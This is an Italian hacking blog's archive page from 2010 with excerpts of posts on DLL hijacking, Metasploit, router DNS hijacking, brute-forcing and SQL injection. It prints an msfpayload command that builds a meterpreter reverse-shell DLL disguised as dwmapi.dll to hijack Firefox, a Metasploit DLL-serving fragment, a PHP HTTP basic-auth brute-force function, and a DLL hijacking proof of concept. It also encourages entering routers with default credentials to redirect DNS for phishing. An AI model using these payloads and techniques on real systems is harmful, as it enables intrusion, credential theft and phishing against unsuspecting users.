Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Archivio: ‘Software’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D


Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end


(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 2 Comments »

[Metasploit] multi/handler :D

agosto 30th, 2010 by clshack

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll


Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[Remote-Router]Fake DNS and Phishing/Exploiting attack

agosto 29th, 2010 by clshack

In pochissimi, cambiano la password al router -.-’ per comodità si lascia quella di default, quella facile da ricordare o.O

User: admin
Password: admin

In questo modo, se il router è raggiungibile dall’esterno, oppure se un utente, riesce ad entrare nella nostra rete può sfruttando i dns effettuare attacchi mirati verso il vostro il pc :D
Gli attacchi vanno dal phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

fino a per prendere il controllo remoto del pc vittima :D

Tutto questo sfruttando i dns.
Quando riusciamo ad entrare nei router, oltre a cambiare l’ssid del wifi in “Che stronzo che sie” / “Sei un merda” e stronzate varie possiamo cambiare i dns.
Ad esempio io ho quelli di google o.O

I server dns, volgarmente parlando, non fanno altro che restituire l’ip del sito internet a cui ci stiamo connettendo, ad esempio se digitiamo www.clshack.it:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.it
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.it. IN A
;; ANSWER SECTION:
www.clshack.it. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Ci restituisce:
94.141.22.26
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Programmazione, Software | 20 Comments »

[PHP]BruteForce Http basic authentication

agosto 25th, 2010 by clshack

Subito avevo scritto questo scanner in python, poi non riuscivo a gestire bene l’eccezzione httplib.badstatus e quindi ho converti lo scanner in php :D è è è esercizio :D

La configurazione dello scanner è ababstanza semplice, per l’autentificazione, ho usato i la libreria curl di php ;)

La funzione per fare un login in , con i curl è:

function authentication($ip,$user,$password)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL,$ip);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_NOBODY, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
	curl_setopt($ch,CURLOPT_USERPWD, "$user:$password");
	curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
	curl_exec($ch);
	$info =curl_getinfo($ch);
	curl_close ($ch);
	if($info["http_code"]=="200")
        {
		return 1;
        }
	else
        {
		return 0;
         }
}


Codice abbastanza semplice :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Programmazione, Software | 13 Comments »

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

agosto 25th, 2010 by clshack

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}


(continua…)

Tags: , , ,
Posted in Hacking, Software | 22 Comments »

Tecniche avanzate di SQL INJECTION/XSS

agosto 12th, 2010 by clshack

Evilsocket, nel febbraio 2010 mi aveva aperto gli occhi, sul come da una normale sql injection blind o normal che sia, è possibile aprirsi una shell remota sul server vittima :D

Vediamo un esempio di codice php buggato:

mysql_query("SELECT a FROM b WHERE id=".$_GET['id']);
Come vediamo, il parametro id non viene filtrato …
Sarebbe opportuno, per essere invulnerabili, inserire un:
(int) $_GET['id']

Ora nella variabile $_GET['id'] possiamo inserire codice sql :D
(continua…)

Tags: , , , , ,
Posted in Hacking, Software | 7 Comments »

[MS10-054]Metasploit:Remote DOS Microsoft SMB Server Trans2

agosto 12th, 2010 by clshack

E il nostro amico g-laurent, famoso per i suoi exploit ha scoperto una nuova vulnerabilità del protocollo SMB di windows :P

Cosa possiamo fare con questo exploit o.O ?

Dal sito microsoft:

Vulnerability details

In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default)

(continua…)

Tags: , , , ,
Posted in Hacking, Software | No Comments »

[Tutorial]Fierce v2: Sub-Domain Scanner

agosto 7th, 2010 by clshack

Dal sito ufficiale, leggiamo:

Fierce Domain Scan was born out of a frustration while performing a web application security audit. It used to be very time-consuming to discover large swaths of a non-contiguous corporate network, but it doesn’t have to be. It’s terribly easy to run a scanner against an IP range, but if a network’s web presence is distributed across multiple ranges, you can miss huge chunks of networks. Fierce helps solve that problem.

Fierce is a reconnaissance tool written in Perl that quickly scans domains (usually in just a few minutes, assuming no network lag) using a variety of techniques to locate undocumented, internal or just hard-to-find resources via the DNS system.

In poche parole, è facile da usare, è scritto in perl, ed è molto potente :D
Ma a cosa ci serve ? o.O
A scoprire tutti i sotto domini dei siti vittima e altre informazioni utili :D ecc ecc ecc :D
Vediamo come installarlo e usarlo :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

DOWNLOAD BackTrack 4 R1 – Public Release

agosto 5th, 2010 by clshack

Molte novità interessanti :D sopratutto:

full Fluxbox desktop environment has been added


Oltre al kernel aggiornato, a nuovi tools e ai nuovi driver disponibili :D
Changelog ufficiale:

  • Kernel 2.6.34 – With fragmentation patches, etc.
  • Updated tools, such as Maltego and SET.
  • Improved driver support, broader range of wireless cards supported.
  • Faster desktop experience due to kernel.
  • Fluxbox environment added.

DOWNLOAD

Tags: ,
Posted in GNU/Linux, Hacking, Software | 2 Comments »

XSS: MORE POWER WITH Beef and Metasploit

agosto 1st, 2010 by clshack

Panicoo, si avevo voglia di un titolo in inglese o.O

Vediamo oggi come attaccare un computer con metasploit, sfruttando un xss, assieme a BeEF(browser exploitation framework)


XSS WIKI:

Il Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell’input (parametri di richieste HTTP GET o contenuto di richieste HTTP POST). Un XSS permette ad un attaccante di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo si potranno sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina.

Bene, cominciamo :D
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 9 Comments »
« Older Entries